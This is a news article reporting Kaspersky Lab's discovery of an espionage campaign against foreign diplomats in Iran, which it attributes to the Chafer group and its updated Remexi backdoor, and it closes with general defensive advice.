Security researchers have uncovered a new cyber-espionage campaign against foreign diplomats in Iran, using malware linked to a well-known APT group.
Kaspersky Lab researcher Denis Legezo claimed the campaign was indicative of hackers in emerging regions using “homebrew” malware combined with publicly available tools.
In this case, they use an improved version of the Remexi backdoor first reported in 2015, enabling them to: harvest keystrokes, take screenshots, exfiltrate credentials, log-ins and browser history and execute remote commands.
Data is exfiltrated using the legitimate Microsoft Background Intelligent Transfer Service (BITS) application, saving the group time and money and complicating attribution efforts, Kaspersky Lab claimed.
“When we talk about likely state-sponsored cyber-espionage campaigns, people often imagine advanced operations with complex tools developed by experts. However, the people behind this spyware campaign look more like system administrators than sophisticated threat actors: they know how to code, but their campaign relies more on the creative use of tools that exist already, than on new, advanced features or elaborate architecture of the code,” Legezo argued.
“However, even relatively simple tools can cause significant damage so we urge organizations to protect their valuable information and systems against all level of threats, and to use threat intelligence to understand how the landscape is evolving,”
There’s no word yet on how the malware is being spread, although it has been linked to a Farsi-speaking APT group known as Chafer, whose activity goes as far back as 2014.
The group is known to focus on domestic targets, although going after foreign embassies within the Islamic Republic represents a new approach.
Legezo urged organizations to arm themselves with: corporate-grade security, including capabilities to detect targeted attacks, enhanced security awareness training for employees and up-to-date threat intelligence data.